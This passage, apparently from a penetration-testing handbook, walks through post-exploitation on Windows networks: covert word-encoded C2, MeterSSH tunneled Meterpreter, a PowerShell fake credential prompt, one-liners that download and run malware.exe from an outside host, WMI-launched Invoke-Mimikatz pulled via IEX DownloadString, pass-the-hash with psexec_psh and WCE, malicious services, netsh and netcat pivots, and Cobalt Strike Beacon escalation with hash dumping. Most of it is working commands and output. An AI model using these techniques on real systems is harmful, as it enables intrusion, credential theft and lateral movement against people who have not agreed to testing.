[Screenshot: Wireshark "Follow TCP Stream" (filter tcp.stream eq 55) of the client's HTTP POST to the C2 server and the 200 OK response; both bodies are long runs of dictionary words such as "anger should grow house hand high animal grow end follow animal high port light country picture ... point point sun ... fellow eye earth", 1440 bytes for the entire conversation]
Custom C2 - TCP Stream Using Words


As you can see, the client sent what looks to be a very badly constructed sentence and the response 
from the nginx C2 server (not really nginx but python) is a long run-on mix of words. Whether you are 
sending your victim’s files or commands, they will all follow the same structure. 


Think about this for a second: If you are monitoring the network or configuring an IDS, how do you 
detect this type of traffic? Unless you are reading line by line, the traffic looks just like normal web 
traffic. There are no patterns or special characters, and the sentences actually look like sentences (but 
don’t make sense of course). You could be on this host all day long and never be detected. This is just 
a PoC, which was developed for a specific penetration test. I recommend you take the code and 
expand on it or build your own. 


Evading Application Based Firewalls 


We are seeing more and more UTM-based firewalls that perform Application Level Filtering. 
Meaning that if the traffic on a given port is not the protocol defined for that port, it is going to be denied, which will 
trigger an alert. 


Building a communication tunnel yourself would be a great exercise for any pentester. Luckily, David 
Kennedy has already done the work for you. {50} {51} I forked a copy from David’s Github; however, I 
did have to make one change. On line 108, I commented out the “break” in his code. 


Installation and configuration: 
• git clone https://github.com/cheetz/meterssh /opt/meterssh 
• cd /opt/meterssh 
• gedit meterssh.py 
• At the bottom modify the following: 
  o user = "sshuser" 
  o password = "sshpw" 
  o rhost = "192.168.1.1" 
  o port = "22" 


Make sure Veil-Evasion is installed as it takes care of many of the dependencies. It takes a little work 
to get everything configured since we need to start the SSH service and install some dependencies: 
• service ssh start 
• git clone https://github.com/warner/python-ecdsa.git /opt/python-ecdsa 
• cd /opt/python-ecdsa/ && wine C:/Python27/python.exe ./setup.py install 
• git clone https://github.com/paramiko/paramiko.git /opt/paramiko 
• cd /opt/paramiko/ && wine C:/Python27/python.exe ./setup.py install 
• git clone https://github.com/pyinstaller/pyinstaller.git /opt/pyinstaller 
• cd /opt/pyinstaller/ && wine C:/Python27/python.exe /opt/pyinstaller/setup.py install 
• cd /opt/ && wget https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.zip#md5=3eb18a454311707ab7808d881e677329 && unzip PyInstaller-2.1.zip 
• cd /opt/meterssh/ 
• wine C:/Python27/python.exe /opt/PyInstaller-2.1/pyinstaller.py --noconsole --onefile meterssh.py 


After it successfully completes, you should have a new Windows Executable located at 
/opt/meterssh/dist/meterssh.exe. Copy this file to your victim host and start the meterssh.exe. 


• cd /opt/meterssh/ && python ./monitor.py 
• Execute the executable on a victim host 


[Screenshot: pyinstaller building /opt/meterssh/dist/meterssh.exe; monitor.py prints "Launching count_monitor at 8 second intervals..." and "Polling... Waiting for connection into SSH encrypted tunnel..." until "Encrypted tunnel identified. Yipee, we gots a shell!" and "Creating a Metasploit answer file for you. Wait one minute."; on the victim, C:\Users\cheetz\Desktop\meterssh.exe reports "Shellcode injection loaded into memory...", "Spawning meterpreter on localhost on port: 8021", "Tunneling SSH, this takes a moment.", "You should have a shell raining in a sec.." and "Connected to 192.168.222.129:22 successfully"]
MeterSSH


The binary we created ran on the victim host, connected back to our server over SSH and created a local port forward on 8021. The Meterpreter session is then tunneled inside that SSH connection, so a network IDS or application-layer firewall in the path sees only an outbound SSH session, never the Meterpreter traffic. This is also why the answer file below uses a bind_tcp payload on the forwarded port 8021 instead of a reverse handler.


[*] Processing answer.txt for ERB directives.
resource (answer.txt)> use multi/handler
resource (answer.txt)> set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
resource (answer.txt)> set RHOST 0.0.0.0
RHOST => 0.0.0.0
resource (answer.txt)> set LPORT 8021
LPORT => 8021
resource (answer.txt)> exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (770048 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:51709 -> 127.0.0.1:8021) at ... 22 17:55:45 -0500

meterpreter > shell
Process 5936 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\cheetz\Desktop>

SSH Tunnel





Powershell


As you can see, PowerShell is an amazing tool for any penetration tester.

One of my favorite attacks is the simplest. If you end up on a host where you have limited privileges, which prevents you from using Mimikatz or even dropping executables, you can always ask the user for their password.


Let’s say you have a shell on a system (it doesn’t have to be Meterpreter). What if you could push a popup that prompts the user to type in their credentials? Let’s demonstrate the power of PowerShell, using Easy-P to encode the popup script:

• cd /opt/Easy-P
• python ./easy-p
• 7 - Base64 Encode
• 1 - From File
• /opt/PowerShell Popup/popup.ps1


Easy-P menu (abridged): Privilege Escalation, Lateral Movement, Keylogging, PowerShell Meterpreter, Change Users Execution Policy, Powershell 101, Base64 Encode a PowerShell Script, Mimikatz - Passwords from Memory, [99] Exit/Quit

Select An Option: 7
1 = File; 2 = One liner: 1
full file path and file: /opt/PowerShell Popup/popup.ps1
[*] Powershell.exe -NoP -Exec Bypass -enc ZgB1AG4AYwB0AGkAbwBu...

Base64 Encoded PowerShell Password Popup





The output will be a long, base64 encoded string. Once we execute the command on our victim’s host, 
we should see results similar to those below. 


[Screenshot: from meterpreter > shell on the victim (Process 8924 created, Windows 6.1), the Powershell.exe -NoP -Exec Bypass -enc ... one-liner is run from C:\Users\cheetz; on the right the user sees a credential dialog reading “Please enter your user name and password”, with User name “admin” and a masked Password field; once OK is clicked the shell prints the captured values “admin” and “password”]

PowerShell Password Popup


The window on the right shows that the victim received a popup that says, “Credentials are required.” Once the victim enters their credentials and hits OK, the response is sent back to our command shell. This is where a little social engineering takes place. In some cases, the user might hit cancel or close the password prompt without typing in their credentials, but if you run the command three or four more times, more than likely the user will get tired of the message and end up putting in their password. A benefit of this type of attack is that the victim host did not need to download anything from the Internet, since the whole payload is inside the encoded command, and no elevated privileges were needed. Keep in mind that fileless is not invisible: the full -enc command line is recorded by anything that logs process creation with command-line auditing (Windows event 4688 or Sysmon), and the blob decodes back to the script in one step.


Windows 7/8 Uploading Files To The Host


On Windows 7 and 8, a better way to get files onto a host is bitsadmin or PowerShell. bitsadmin is useful because it drives the same BITS service Windows Update uses and it honors the IE proxy settings, so if the organization has a web proxy that requires AD credentials, the download still goes out as the logged-on user.


PowerShell (check the Post Exploitation with PowerSploit section for more details):

• cmd.exe /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.securepla.net/malware.exe','malware.exe');(New-Object -com Shell.Application).ShellExecute('malware.exe')"


Bitsadmin:

• cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://www.securepla.net/malware.exe c:\malware.exe & start c:\malware.exe"

bitsadmin needs an absolute path for the destination file, and /transfer blocks until the job completes, which is why the start can simply be chained after it.


Pivoting


If you have compromised a host and realize that it is either dual-homed or connected to multiple networks, your attacks will have to pivot through that compromised host. The following example routes a port scan through our initial victim host into the segmented network.


Autoroute and Auxiliary Scan
• run autoroute -s 192.168.1.0/24
• run autoroute -p
• background
• use auxiliary/scanner/portscan/tcp
• set RHOSTS 192.168.1.127
• set PORTS 135,139,445
• set THREADS 20
• exploit


msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run autoroute -s 192.168.1.0/24
[*] Adding a route to 192.168.1.0/255.255.255.0...
[*] Added route to 192.168.1.0/255.255.255.0 via 192.168.3.73
[*] Use the -p option to list all active routes

meterpreter > run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.1.0        255.255.255.0      Session 1

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.1.127
RHOSTS => 192.168.1.127
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  16               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.1.127    yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > set PORTS 137,139,445
PORTS => 137,139,445
msf auxiliary(tcp) > exploit

[*] 192.168.1.127:445 - TCP OPEN
[*] 192.168.1.127:139 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Pivoting


Now that we have a pivot set up, we can run additional modules through that same route, for example:
• use auxiliary/scanner/discovery/udp_probe
• use exploit/windows/smb/psexec


Socks Proxy

Sometimes you need to run non-Metasploit tools through your first victim host. It might be a vulnerability scanner, nmap, or a particular exploit. Once we have a Meterpreter shell, we can background that session and add some routes. We want to be able to pivot through this first host and run nmap in our example.


In our next example, our victim host has an IP of 192.168.2.24, but also has access to the 192.168.1.0/24 range. Since we can't access that network directly, we will have to pivot off this box using proxychains: (52)(53)

• route add 192.168.1.0 255.255.255.0 4
• route print
• use auxiliary/server/socks4a
• run


This starts a SOCKS4a listener on our Kali attacker host on port 1080. We now need to modify the default proxychains configuration to match our Metasploit settings. After that, we can kick off nmap through the socks4 proxy using the proxychains tool:
• gedit /etc/proxychains.conf
  ◦ change “socks4 127.0.0.1 4444” to “socks4 127.0.0.1 1080”
• proxychains nmap -sT -P0 -p135,139,445 192.168.1.127

Two things to keep in mind: a SOCKS proxy only carries complete TCP connections, so the scan has to be a connect scan (-sT) with host discovery disabled (-P0, or -Pn in current nmap), because SYN scans, ICMP pings and UDP probes never traverse the proxy; and the route added to session 4 only works for as long as that session stays alive.


The output should look something like:
root@kali:~# gedit /etc/proxychains.conf
root@kali:~# proxychains nmap -sT -P0 -p135,139,445 192.168.1.127
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 6.47 ( http://nmap.org ) at 2015-03-21 17:10 EDT
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:135-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:139-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.1.127:445-<><>-OK
Nmap scan report for win7-core (192.168.1.127)
Host is up (1.5s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds


Move Laterally with Hashes

As you might have heard, pass-the-hash is dead... or is it? A big change in the last year is that Microsoft made it much harder to connect to remote systems using local accounts that are merely members of the local “Administrators” group. This used to be the easiest way to move laterally when you grabbed Local Admin passwords from Group Policy Preferences and used PsExec. (The mechanism at work is UAC remote-token filtering for local accounts, controlled by the LocalAccountTokenFilterPolicy registry value that appears again in the Proxy Between Hosts section below; domain accounts are not subject to it.)


There is one exception to this: the built-in local administrator account with RID 500 is exempt. Even if the RID 500 account has been renamed, it can still be used to move laterally.(54)(55)


Once you obtain hashes for the RID 500 account, or you get onto a network without patched client systems, you can use the hashes instead of passwords to gain Meterpreter shells. As specified before, we are going to use psexec_psh instead of the standard psexec.


Module options (exploit/windows/smb/psexec_psh):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DryRun                false            no        Prints the powershell command that would be used
   RHOST                 172.16.151.201   yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(psexec_psh) > set SMBPass aad3b435b51404eeaad3b435b51404ee:[NT hash]
SMBPass => aad3b435b51404eeaad3b435b51404ee:[NT hash]
msf exploit(psexec_psh) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec_psh) > exploit

[*] Started reverse handler on 172.16.151.141:4444
[*] 172.16.151.201:445 - Executing the payload...
[+] 172.16.151.201:445 - Service start timed out, OK if running a command or non-service executable
[*] Sending stage (770048 bytes) to 172.16.151.201
[*] Meterpreter session 5 opened (172.16.151.141:4444 -> 172.16.151.201:60527)

Using Hashes to Pivot


By setting SMBPass to the LM:NT hash pair, we don't need to crack anything to exploit remote systems. The LM half shown here (aad3b435b51404eeaad3b435b51404ee) is the value every modern host reports when no LM hash is stored; only the NT half carries the credential.
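Hash dumps appear throughout this chapter in the same user:RID:LM:NT::: line format (here, in the WCE output that follows, and in the Cobalt Strike hashdump later), and two quick checks decide what each line is good for: is the account RID 500, and is the NT half the well-known empty-password hash. The Python below is an added example, not code from the book or from Metasploit; the sample dump it parses is constructed for this example with invented hash values, and the psexec_psh settings it prints are the ones shown above.

```python
import re
from dataclasses import dataclass
from typing import List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM half when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample in hashdump/pwdump format (user:RID:LM:NT:::).  The hash
# values are invented for this example and do not come from any real host.
SAMPLE_HASHDUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3106c7e016ae931073c5917e0c089c01:::
win7:1000:aad3b435b51404eeaad3b435b51404ee:1c96c42db88e6248094db1f2958732c8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helpdesk:1001:0d4c5b1f2a9e3c8d6b7a1f0e9d8c7b6a:8323d8c4887967093a4f2c7c1d8d9e0f:::
"""

_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def builtin_admin(self) -> bool:
        # The built-in Administrator keeps RID 500 no matter what it is renamed to.
        return self.rid == 500

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means a password of 14 chars or less that cracks in minutes.
        return self.lm != EMPTY_LM

    @property
    def smbpass(self) -> str:
        """Value for Metasploit's SMBPass option: LM:NT, no cracking needed."""
        return f"{self.lm}:{self.nt}"


def parse_hashdump(text: str) -> List[Account]:
    """Pull user:RID:LM:NT::: lines out of raw tool output, ignoring banners."""
    accounts = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def pth_candidates(accounts: List[Account]) -> List[Account]:
    """Local accounts worth passing to psexec_psh against a host with default
    UAC remote restrictions: only RID 500 is exempt from token filtering, and
    an empty-password account cannot authenticate over SMB anyway."""
    return [a for a in accounts if a.builtin_admin and not a.empty_password]


def msf_commands(account: Account, rhost: str) -> List[str]:
    """The psexec_psh settings shown above, filled in from a parsed line."""
    return [
        "use exploit/windows/smb/psexec_psh",
        f"set RHOST {rhost}",
        f"set SMBUser {account.user}",
        f"set SMBPass {account.smbpass}",
        "exploit",
    ]


if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE_HASHDUMP)
    for a in accts:
        flags = [f for f, on in (("RID500", a.builtin_admin),
                                  ("EMPTY", a.empty_password),
                                  ("LM", a.lm_stored)) if on]
        print(f"{a.user:<14} rid={a.rid:<5} {' '.join(flags)}")
    for a in pth_candidates(accts):
        print("\n".join(msf_commands(a, "172.16.151.201")))
```

On a default Windows 7 image the built-in Administrator is disabled with an empty password, which is exactly the case the empty-hash check screens out; the non-500 local admins in the dump are still useful on hosts where LocalAccountTokenFilterPolicy has been set to 1.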


Moving Laterally with NTLM Hashes

We know that if other users are logged into the system, we can use incognito and impersonate their tokens.(56) What if you had hashes from different systems and wanted to become that remote user on the currently compromised machine?


This is where we can use the manipulated WCE (Windows Credential Editor) binary that we configured in the Evading AV section and use it to import hashes onto our victim host. For the example below, we are assuming we already have local admin or SYSTEM level access. With our Meterpreter shell, upload your WCE binary to an accessible location:

• upload /opt/wce.exe C:\\users\\public

We can drop into a shell with the “shell” command and list the current hashes on the local machine:

• shell
• cd \users\public
• wce -l





[Screenshot: wce -l output listing the two logon sessions cached on the host, each as user:domain:LM:NT]

WCE - Importing Hashes


Notice we only have two sets of hashes on this system. From a prior compromise, we were able to get the hashes of a domain administrator. We need to import these hashes into our current logon session with the following command:

• wce.exe -s [user]:[domain]:[LM hash]:[NT hash]


As you can see from the image below, we were successful in importing the hashes for the user “lab”.


C:\Users\Public>wce -s lab:HACKER:aad3b435b51404eeaad3b435b51404ee:[NT hash]
WCE v1.42beta (X64) (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa
Use -h for help.

Changing NTLM credentials of current logon session (0087D51Eh) to:
Username: lab
domain: HACKER
LMHash: aad3b435b51404eeaad3b435b51404ee
NTHash: [NT hash]
NTLM credentials successfully changed!

C:\Users\Public>dir \\dc\c$
Access is denied.

C:\Users\Public>net use * \\dc\c$ /user:hacker\lab
Drive Z: is now connected to \\dc\c$.

The command completed successfully.

C:\Users\Public>dir Z:\
 Volume in drive Z has no label.
 Volume Serial Number is 40F8-1BB4

 Directory of Z:\

08/22/2013  08:52    <DIR>          PerfLogs
12/28/2014  03:28    <DIR>          Program Files
08/22/2013  08:39    <DIR>          Program Files (x86)
01/19/2015  05:35    <DIR>          share
02/05/2015  12:29    <DIR>          Users
01/05/2015  02:02    <DIR>          Windows

WCE - Access Hosts Using Hashes


With “lab’s” hashes imported, we can try to access the domain controller’s C drive. When we try to connect to the domain controller (dc) with “dir \\dc\c$”, we get an access denied message. That is because the existing connection to the DC is not using the “lab” account. We can mount the domain controller’s C drive using the imported credentials with the following command:
• net use * \\dc\c$ /user:hacker\lab

Because the NTLM credentials of the current logon session are now lab’s, the mapping authenticates with the cached “lab” hashes without a password ever being typed. The image above shows that we successfully mounted the domain controller’s C$ share as the Z drive and now have the ability to interact with the DC.


This attack leads to a wealth of additional attacks and is a great complement to smart lateral movement.


Moving Laterally with WMI

WMI allows you to remotely execute commands, including PowerShell. The benefit of this attack is that it sidesteps file-based anti-virus, because the PowerShell script is downloaded and run entirely in memory; nothing touches disk except the output file you choose to write. In the example below, we supply credentials to WMI to execute our command on the remote host:


• wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/.../Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"
• dir \\win8\c$\Users\Public\
• type \\win8\c$\Users\Public\a.txt
• del \\win8\c$\Users\Public\a.txt


In the image below, we are currently on the host win7. We execute a wmic call to remotely run a PowerShell script against the host win8. This command runs Mimikatz and dumps its output to a file on the remote host. Once it completes, we read the file over the C$ share from win7 and then delete it, since a.txt holds cleartext credentials and must not be left behind.


[Screenshot: the wmic /USER /PASSWORD /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString(...); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" command run from C:\Users\testuser1 on win7, followed by dir and type of \\win8\c$\Users\Public\a.txt]

Moving Laterally with WMI


Moving Laterally Using Services

Another way to move laterally is to copy a file to another system to which you have access and execute it there. We heavily used PowerShell to download and execute files in prior examples. However, you might come across that one system that doesn't have PowerShell enabled. In the next command, we copy our malware to the remote host’s public folder:

• copy malware.exe \\[Remote Machine]\C$\users\public


Then, we create a service called Antivirus and configure that service to execute our malware:
• sc \\[Remote Machine] create Antivirus binpath= "c:\users\public\malware.exe"
  ◦ Make sure to add the space between binpath= and your executable; sc’s argument parser requires it.


Lastly, we start that service with:
• sc \\[Remote Machine] start Antivirus


[Screenshot: copy malware.exe \\[Remote Machine]\C$\users\public, sc \\[Remote Machine] create Antivirus binPath= "c:\users\public\malware.exe" and sc \\[Remote Machine] start Antivirus run from C:\Users\testuser1\Desktop]

Creating Malicious Services


Remember that you will need a privileged account on the remote machine that can create services and start/stop them. Also expect “sc start” to come back with error 1053 (the service did not respond to the start request in a timely fashion): malware.exe is not a real service binary, so the Service Control Manager kills it when its start timeout expires. The process has already executed by then, so a payload launched this way needs to migrate or spawn a new process before the timeout hits. This is the same reason the Metasploit psexec modules print “Service start timed out, OK if running a command”.


Proxy Between Hosts

Let's say you are on the network, but you cannot reach specific subnets because they are only reachable from certain user machines or IPs. In these cases, you will have to proxy off a host with the proper IP or access.


Windows:

One of the cheap and easy ways to proxy between hosts in segmented networks is to use a built-in Windows function. Netsh is a command line tool for modifying network configuration. The following command puts the host in listening mode on port 8080 and redirects every connection to 192.168.5.33 on port 3389. This is an easy way to proxy RDP traffic into other hosts. Remember that you will need elevated privileges to run these commands.


You can either use WMIC to execute it remotely or, if you already have a shell, use the following command:
• netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.5.33

You can confirm the rule with “netsh interface portproxy show all”. Portproxy is implemented by the IP Helper service (iphlpsvc) and needs the IPv6 stack present even for v4tov4 rules, so if the add command succeeds but nothing is listening on 8080, check that service first.


If you want to do it straight through Netsh remotely:
• reg add \\<Remote IP>\HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
• sc \\<Remote IP> start remoteregistry
• sc \\<Remote IP> start remoteaccess
• netsh
• set machine <Remote IP>
• interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.5.33

The reg add sets LocalAccountTokenFilterPolicy so that a local administrator account is not token-filtered when it connects over the network (see Move Laterally with Hashes). The remote reg add itself goes through the Remote Registry service, so if it fails with an RPC error, run the sc start remoteregistry line first.


The great part about the Netsh port proxy is that it also supports IPv4 to IPv6 proxying (v4tov6). You can now take one of the compromised hosts and proxy your RDP requests into that segmented network.(57)

Linux:

The old but always faithful way of proxying through Linux uses Netcat and a back pipe. On the victim host through which you want to proxy, run the following commands.(58)

• mknod backpipe p
• nc -l -p 8080 0<backpipe | nc 10.0.18.134 3389 | tee backpipe


In the example above, we proxy through the compromised host by connecting to port 8080. This forwards the connection to the RDP service at 10.0.18.134. Note that this relay handles one connection at a time and exits when that connection closes, so re-run it (or wrap it in a while loop) for each new session, and that the -l -p listen syntax is that of traditional netcat.
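Both the netsh rule and the netcat back pipe do the same job: accept a TCP connection and copy bytes in both directions to a fixed target. As an added example, not code from the book or from either tool, here is that relay in Python. It handles concurrent connections, half-closes each side when the other sends EOF (the part the back pipe exists to get right), and includes a loopback echo server, constructed for the example as a stand-in for the RDP service, so the relay can be exercised offline. The addresses in the closing comment are the ones from the text.

```python
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src reaches EOF, then half-close dst so the
    far side sees the EOF too (what tee + backpipe achieve in the nc version)."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _bridge(client: socket.socket, target) -> None:
    """Service one accepted connection: connect to target, pump both ways."""
    try:
        upstream = socket.create_connection(target, timeout=10)
    except OSError:
        client.close()          # target unreachable: drop the client
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)     # client -> target runs in this thread
    back.join()                 # wait for target -> client to drain
    client.close()
    upstream.close()


def start_relay(listen_port: int, target, listen_addr: str = "0.0.0.0") -> socket.socket:
    """Listen on listen_addr:listen_port and forward every connection to target,
    like the netsh portproxy rule.  Returns the listening socket (close it to
    stop accepting).  listen_port=0 lets the OS choose a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_addr, listen_port))
    srv.listen(16)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return          # listener was closed
            threading.Thread(target=_bridge, args=(conn, target), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def start_echo_server() -> socket.socket:
    """Loopback stand-in for the RDP service (constructed for the example):
    echoes whatever it receives until the client half-closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def echo(conn: socket.socket) -> None:
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=echo, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def relay_roundtrip(payload: bytes) -> bytes:
    """Send payload through a fresh relay to the echo server and return what
    comes back.  Everything stays on 127.0.0.1 with OS-assigned ports."""
    echo = start_echo_server()
    relay = start_relay(0, echo.getsockname(), listen_addr="127.0.0.1")
    try:
        with socket.create_connection(relay.getsockname(), timeout=10) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)      # tell the chain we are done sending
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    # Offline self-check.  On a pivot host the call from the text would be
    # start_relay(8080, ("10.0.18.134", 3389)) followed by an RDP client
    # pointed at the pivot's port 8080.
    print(relay_roundtrip(b"hello through the pivot"))
```

Unlike the netcat one-liner, which serves a single connection and exits, this listener keeps accepting, so several RDP sessions can ride the same pivot; and because each direction is half-closed independently, a client that finishes sending still receives everything the target has left to say.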


Commercial Tools:


So far, I have talked about many open source tools. Now, I want to also mention their commercial counterparts. This is solely to build awareness of what is available as a resource. I am frequently asked whether it is better to go totally open source or to use commercial products. There is no right or wrong answer. What is important is that you do not limit yourself to one side or the other, but instead find the processes, tools, and techniques that are right for that particular job.


Cobalt Strike:


Cobalt Strike is one of my favorite tools for a multitude of reasons. Cobalt Strike sits on top of the Metasploit Framework and can attack, pivot, evade AV, establish persistence and, most importantly, provide custom payloads (such as Beacon). More on Beacon here: http://www.advancedpentest.com/help-beacon. The main reason I recommend that all pentesters look into Cobalt Strike is the way its C2 can communicate over DNS. Networks are starting to thoroughly regulate what traffic can leave the network with tools such as Next-Generation Firewalls. Beacon’s DNS channel rides the organization’s own recursive resolvers, so the compromised host never talks to the attacker directly, which gets it past a lot of egress filtering and network security detection tools.


New Cobalt Strike licenses cost $3,500 per user for a one-year license. License renewals cost $2,500 per user per year. You can get a 21-day trial license by going to:


http://www.advancedpentest.com/


A lot of the attacks discussed in this book, such as keyloggers, pivoting and AV evasion, are incorporated into Cobalt Strike in an easy-to-use fashion. The best part is that you are able to see your attacks visually while still having the full command line, as you would with msfconsole. It is really the best of both worlds.


Getting Started with Cobalt Strike:


• http://www.advancedpentest.com/download
• mv cobaltstrike-trial.tgz /opt/
• cd /opt/
• tar zxvf cobaltstrike-trial.tgz
• update-java-alternatives --jre -s java-1.7.0-openjdk-i386
[Screenshot: Cobalt Strike listener setup with payload windows/beacon_http/reverse_http on host 172.16.151.141, and the Attacks menu showing Windows Dropper and Windows Executable]

Cobalt Strike - Beacons


• Go to View --> Beacons
• You will see a listing of all available Beacons
• Interact with your currently active Beacon
• Inside the Beacon command prompt, type bypassuac and select the Beacon listener as the payload


[Screenshot: the Cobalt Strike “Choose a listener” dialog, listing win_met (windows/meterpreter/reverse_http), generic/shell_reverse_tcp and windows/beacon_http/reverse_http, opened from the Beacon console of 172.16.151.202]

Cobalt Strike - BypassUAC


If we go back to the Beacons list, we will see our new Beacon connection with an asterisk (*) next to 
it. 


external         internal         user         computer  note  pid   last
172.16.151.202   172.16.151.202   testuser1 *  WIN7            2712  59s
172.16.151.202   172.16.151.202   testuser1    WIN7            2908  859ms

Cobalt Strike - New Beacon


If we interact with this Beacon, we can run the usual commands:
• help - get a listing of all the commands
• getsystem - elevate to SYSTEM
• ps - list processes
• steal_token - steal the access token of a process, for example one owned by a Domain Admin
• spawn - spawn a new Beacon or shell session
• sleep 0 - make Beacon check in continuously, needed before dropping into a Meterpreter session
• mode http - switch Beacon to HTTP so the Meterpreter session can be tunneled
• meterpreter - drop into a Meterpreter session


beacon> help
...
    spawnto       Set executable to spawn processes into
    steal_token   Steal access token from a process
    task          Download and execute a file from a URL
    timestomp     Apply timestamps from one file to another
    unlink        Disconnect from parent Beacon
    upload        Upload a file

beacon> getsystem
[*] Tasked beacon to get SYSTEM
[+] host called home, sent: 14 bytes
[+] Impersonated NT AUTHORITY\SYSTEM

[Screenshot: the Cobalt Strike escalate menu (drop_lnk, getsystem, ms10_073_kbdlayout, net_runtime_modify, screen_unlock) for host 172.16.151.202, HACKER\testuser1 on WIN7, and the hashdump post module tab:]

[*] Post module running as background job
[*] Running module against WIN7
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20150115014752_default_172.16.151.202_windows.hashes_429476.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 61311de359d2dafde9e4b565c99fc163...
[*] Obtaining the user list and keys...
[*] Handle is invalid, retrying...
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 61311de359d2dafde9e4b565c99fc163...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
win7:1000:aad3b435b51404eeaad3b435b51404ee:1c96c42db88e6248094db1f2958732c8:::

Cobalt Strike - Compromised Hosts


